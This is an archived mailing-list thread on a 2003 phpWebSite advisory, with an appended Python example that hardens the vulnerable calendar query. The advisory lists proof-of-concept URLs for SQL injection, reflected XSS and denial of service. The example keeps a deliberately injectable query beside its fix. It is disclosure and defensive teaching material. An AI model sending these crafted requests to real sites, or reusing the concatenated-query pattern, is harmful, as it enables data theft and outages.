Message-ID: <47798.152.10.115.146.1060635666.squirrel@tux.appstate.edu>
From: dg49379 at tux.appstate.edu (Darren Greene)
Subject: phpWebSite SQL Injection & DoS & XSS Vulnerabilities
The fix posted on phpwebsite.appstate.edu fixes both XSS and SQL injections.
Darren
> Hi Jack,
> I was contacted by the phpWebSite team to release the fix.
> The fix is only to prevent the XSS attacks; they are working now on
> fixes for the SQL Injections.
>
> best regards,
>
>> There is a fix for this available at phpWebSite's page (posted a
>> short time ago):
>> http://phpwebsite.appstate.edu/
>>
>> -Jack Whitsitt
>>
>>
>> ----- Original Message -----
>> From: "Lorenzo Hernandez Garcia-Hierro" <novappc@...appc.com>
>> To: <full-disclosure@...ts.netsys.com>
>> Sent: Sunday, August 10, 2003 6:15 PM
>> Subject: [Full-Disclosure] phpWebSite SQL Injection & DoS & XSS Vulnerabilities
>>
>>
>> >
>> > phpWebSite SQL Injection & DoS & XSS Vulnerabilities
>> > ------
>> > PRODUCT: phpWebSite
>> > VENDOR: Appalachian State University
>> > VULNERABLE VERSIONS:
>> >
>> > - 0.9.x
>> > - 0.8.x
>> > - 0.7.x
>> > - And older versions.
>> >
>> > NON-VULNERABLE VERSIONS
>> >
>> > - ?
>> > ---------------------
>> >
>> > Description:
>> >
>> > phpWebSite provides a complete web site content management system.
>> > Web-based administration allows for easy maintenance of interactive,
>> > community-driven web sites.
>> >
>> > ---------------------------------------------
>> > |SECURITY HOLES FOUND and PROOFS OF CONCEPT:|
>> > ---------------------------------------------
>> >
>> > I encountered SQL Injection vulnerabilities in some of the phpWebSite
>> > modules, XSS (Cross Site Scripting), Path Disclosures and a Denial
>> > of Service attack.
>> >
>> > -------------
>> > | SQL |
>> > | INJECTION |
>> > -------------
>> >
>> > I encountered SQL Injection vulnerabilities in the Calendar module,
>> > active in default configurations, that allow you to execute SQL
>> > queries in the target server with the privileges of the application
>> > user.
>> >
>> > When you send a specially crafted command URL to the Calendar script
>> > you get a SQL error flag like this:
>> > __________________________________________________________________
>> > DB Error: syntax error
>> > select * from mod_calendar_events where ((startDate >= 2003\0[CRAFTED
>> > VALUE]0110 and startDate <= 2003\0[CRAFTED VALUE]0110) or
>> > (endDate >= 2003\0[CRAFTED VALUE]0110 and endDate <= 2003\0[CRAFTED
>> > VALUE]0110)) and active=1 [nativecode=1064
>> > ** You have an error in your SQL syntax near
>> > '\0[CRAFTED VALUE]0110 and startDate <= 2003\0[CRAFTED VALUE]0110) or
>> > (endDate >= 2003\0[CRAFTED VALUE]0110 and endDate ' at line 1]
>> > ___________________________________________________________________
>> >
>> > This is an example error flag:
>> > ___________________________________________________________________
>> > DB Error: syntax error
>> > select * from mod_calendar_events where ((startDate >= 2003\0-10110 and
>> > startDate <= 2003\0-10110) or
>> > (endDate >= 2003\0-10110 and endDate <= 2003\0-10110)) and active=1
>> > [nativecode=1064
>> > ** You have an error in your SQL syntax near
>> > '\0-10110 and startDate <= 2003\0-10110) or (endDate >= 2003\0-10110
>> > and endDate ' at line 1]
>> > ___________________________________________________________________
>> >
>> > To get this you must use this simple URL:
>> >
>> > http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]
>> > =day&year=2003%00-1&month=
>> >
>> > And you get the SQL Error flag. The error occurs when the query
>> > includes the crafted value 2003[%00 = null]-1 .
>> > You can design a successful query to get configuration values or
>> > authentication data.
>> > I designed a URL that makes a successful query (no hostile query):
>> >
>> > http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]=month&month=11
>> > &year=2003%20and%20startDate%20%3c%3d%2020071205%29%20or%20%28%20endDate
>> > %20%3e%3d031101%20and%20endDate%20%3c%3d%2020071205%29%29%20and%20active%3d1
>> >
>> > It is (without URL encoding):
>> >
>> > 2003 and startDate <= 20071205) or ( endDate >=031101 and endDate <=
>> > 20071205)) and active=1
>> >
>> > It is needed to have a little knowledge of SQL (in this case, MySQL)
>> > to make a successful attack.
>> >
>> > Other scripts of the Calendar module are affected by this hole; when
>> > you send a crafted request, like a + symbol at a critical URL variable
>> > value, you get the "pure" SQL server error flag and you can imagine (I
>> > like this word) a SQL query to view private information of the
>> > application by looking at the error pages, like a trial-and-error method.
>> >
>> > Other URLs to probe are:
>> >
>> > http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]
>> > =day&month=0&year=<
>> >
>> > http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]
>> > =day&month=1%00&year=)SQL_INJECTION_FAKU
>> >
>> > ------------------
>> > | XSS |
>> > | vulnerabilities|
>> > ------------------
>> >
>> > I encountered XSS security holes in some scripts of phpWebSite :
>> >
>> >
>> > http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]
>> > =day&month=2&year=2003&day=1+%00">[XSS ATTACK CODE]
>> >
>> > http://[HOST]/[PATH]/index.php?module=fatcat&fatcat[user]
>> > =viewCategory&fatcat_id=1%00+">[XSS ATTACK CODE]
>> >
>> > http://[HOST]/[PATH]/index.php?
>> > module=pagemaster&PAGE_user_op=view_page&PAGE_id=10">[XSS ATTACK CODE]
>> > &MMN_position=[X:X]
>> >
>> > http://[HOST]/[PATH]/index.php?
>> > module=search&SEA_search_op=continue&PDA_limit=10">[XSS ATTACK CODE]
>> >
>> >
>> > Note that the Calendar & PageMaster & Fatcat modules are affected
>> > COMPLETELY and all the script variables that are passed by URL are
>> > affected too by this.
>> >
>> > When you access a hostile link with an XSS attack in those scripts your
>> > browser will execute the script commands.
>> > This can be used to steal cookies, authentication tokens and other
>> > private information.
>> > If your browser is vulnerable to other holes (like MSIE ;-) you can
>> > have more problems...
>> >
>> > XSS AT SQL ERRORS:
>> >
>> > If you send a crafted URL command with an XSS attack code to some of the
>> > scripts that are vulnerable against SQL injection vulnerabilities, the
>> > XSS attack code will be executed in the error page.
>> >
>> >
>> > -----------------
>> > | PATH |
>> > | DISCLOSURES |
>> > -----------------
>> >
>> > I tested this on a Win2K (Windows 2000 Professional) with SP3 and these
>> > versions:
>> >
>> > - Sambar Server 5.2 beta
>> > - PHP 4.2.3 running as ISAPI module
>> > - MySQL NT [normal service] 3.23.56
>> > - Include_Path to the pear folder of phpwebsite
>> >
>> > Sending this:
>> >
>> > http://127.0.0.1/index.php?module=calendar&calendar[view]
>> > =month&month=11&year=9 # You can try other things and get the same #
>> >
>> > you get this:
>> >
>> > Warning: localtime(): invalid local time in
>> > C:\ws\phpws\lib\pear\Date\TimeZone.php on line 252
>> >
>> > Warning: localtime(): invalid local time in
>> > C:\ws\phpws\lib\pear\Date\TimeZone.php on line 252
>> >
>> > <- more than fifty repetitions of this warning ->
>> >
>> > It is a strange error; I think that it only occurs in MS Windows
>> > installations.
>> > Possibly it occurs when the Pear library TimeZone.php script tries to
>> > convert the local date into Unix timestamp format.
>> >
>> > ------------------
>> > | DENIAL OF |
>> > | SERVICE |
>> > ------------------
>> >
>> > There is a DoS/Buffer Overflow Attack in a script inside the Calendar
>> > module that allows you to crash the host running the MySQL server and
>> > the phpWebSite scripts (must be the same computer).
>> >
>> > This is a basic proof of concept for this vulnerability :
>> >
>> > http://[HOST]/[PATH]/index.php?index.php?module=calendar&calendar[view]=
>> > [VIEW FORM]&month=11&year=91+92+93...( more than 4000 bytes )
>> >
>> > An attack like this causes a system global crash including the server
>> > service and the mysql service.
>> >
>> > -----------------
>> > | SoLuTiOnS |
>> > -----------------
>> >
>> > 1.- Be sure that the user of the phpWebSite database has only SELECT,
>> > INSERT and UPDATE privileges in only the phpWebSite database.
>> >
>> > 2.- Use the PHP function eregi_replace to prevent XSS attacks.
>> >
>> > 3.- Turn php_error_flags to Off .
>> >
>> > 4.- Use in addition an external module if you are using apache like
>> > mod_security .
>> >
>> > 5.- If you are paranoid don't use PHP, MySQL, Windows, Linux,
>> > computers, tcp/ip, netbios, games, asp, Apache...... nothing!
>> > WARNING ;-) : ( paranoid solution... )
>> >
>> > -----------
>> > | CONTACT |
>> > -----------
>> >
>> > Lorenzo Hernandez Garcia-Hierro
>> > --- Computer Security Analyzer ---
>> > --Nova Projects Professional Coding--
>> > PGP: Keyfingerprint
>> > B6D7 5FCC 78B4 97C1 4010 56BC 0E5F 2AB2
>> > ID: 0x9C38E1D7
>> > **********************************
>> > www.novappc.com
>> > security.novappc.com
>> > www.lorenzohgh.com
>> > ______________________
>> >
>> > NSRG-20-7
>> > _______________________________________________
>> > Full-Disclosure - We believe in it.
>> > Charter: http://lists.netsys.com/full-disclosure-charter.html
>> >
>>
>>
>
>
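The advisory above shows the Calendar module gluing the year/month/day URL parameters straight into the mod_calendar_events query (hence the error flag) and reflecting them unescaped into the page (hence the '">' XSS URLs). The code below is an added example, not phpWebSite's code or the advisory author's: it rebuilds that day lookup in Python against an in-memory SQLite stand-in, places the concatenating version beside a hardened one that whitelists the parameters and binds the date as a query parameter, and escapes a parameter before it is reflected into HTML. Only the table and column names (mod_calendar_events, startDate, endDate, active) come from the query in the advisory; the sample rows, function names and the validation rules are constructed for this example.

```python
# Added example, not phpWebSite code: hardening the Calendar day lookup from
# the advisory. Table/column names follow the query in the advisory's error
# output; everything else here is constructed for the demonstration.
import html
import re
import sqlite3

# Whitelist per URL parameter: plain decimal digits only (constructed rules).
_PATTERNS = {
    "year": re.compile(r"\d{4}"),
    "month": re.compile(r"0?[1-9]|1[0-2]"),
    "day": re.compile(r"0?[1-9]|[12]\d|3[01]"),
}


def parse_date_params(year, month, day):
    """Validate the year/month/day URL parameters and return them as ints.

    Only digits pass, so each payload shape in the advisory is rejected here:
    an embedded NUL (%00), SQL fragments such as ') or (' and the '">' used
    to break out of an HTML attribute.
    """
    for name, value in (("year", year), ("month", month), ("day", day)):
        if not isinstance(value, str) or "\x00" in value:
            raise ValueError(f"invalid {name} parameter")
        if _PATTERNS[name].fullmatch(value) is None:
            raise ValueError(f"invalid {name} parameter")
    return int(year), int(month), int(day)


def make_db():
    """Constructed in-memory stand-in for the mod_calendar_events table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "create table mod_calendar_events "
        "(id integer primary key, startDate integer, endDate integer, active integer)"
    )
    conn.executemany(
        "insert into mod_calendar_events values (?, ?, ?, ?)",
        [(1, 20030110, 20030110, 1),   # active event on 10 Jan 2003
         (2, 20030215, 20030215, 1),   # active event on another day
         (3, 20030110, 20030110, 0)],  # inactive event on 10 Jan 2003
    )
    return conn


def events_for_day_vulnerable(conn, year, month, day):
    """The pattern the advisory describes: raw parameters glued into SQL.
    Kept only to contrast with the hardened version below."""
    stamp = year + month.zfill(2) + day.zfill(2)          # e.g. "20030110"
    sql = (
        "select id from mod_calendar_events where ((startDate >= " + stamp
        + " and startDate <= " + stamp + ") or (endDate >= " + stamp
        + " and endDate <= " + stamp + ")) and active=1 order by id"
    )
    return [row[0] for row in conn.execute(sql)]


def query_by_stamp(conn, stamp):
    """Parameterized lookup: the stamp is bound, never spliced into SQL text,
    so even a non-numeric value is compared as data and matches nothing."""
    sql = (
        "select id from mod_calendar_events where ((startDate >= ? and startDate <= ?)"
        " or (endDate >= ? and endDate <= ?)) and active=1 order by id"
    )
    return [row[0] for row in conn.execute(sql, (stamp, stamp, stamp, stamp))]


def events_for_day(conn, year, month, day):
    """Hardened lookup: whitelist the parameters first, then bind the value."""
    y, m, d = parse_date_params(year, month, day)
    return query_by_stamp(conn, y * 10000 + m * 100 + d)


def render_value(value):
    """Escape a parameter before reflecting it into HTML, which neutralises
    the '">' attribute break-out shown in the advisory's XSS URLs."""
    return html.escape(value, quote=True)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, normal input :", events_for_day_vulnerable(db, "2003", "1", "10"))
    print("vulnerable, crafted day  :", events_for_day_vulnerable(db, "2003", "1", "10) or (1=1"))
    print("hardened, normal input   :", events_for_day(db, "2003", "1", "10"))
    try:
        events_for_day(db, "2003\x00-1", "1", "10")
    except ValueError as exc:
        print("hardened, crafted year   :", exc)
```

The crafted day value shows the difference: concatenation turns the date bound into an extra `or (1=1)` and the query returns every active event, while the hardened path rejects the value before any SQL runs, and `query_by_stamp` would return nothing even if such a value reached it as a bound parameter. The same whitelist also covers the NUL-byte `year` value and the `day=1+%00">` XSS vector from the advisory, and `render_value` handles anything that must be echoed back, which addresses solutions 1 through 3 in the advisory from the application side.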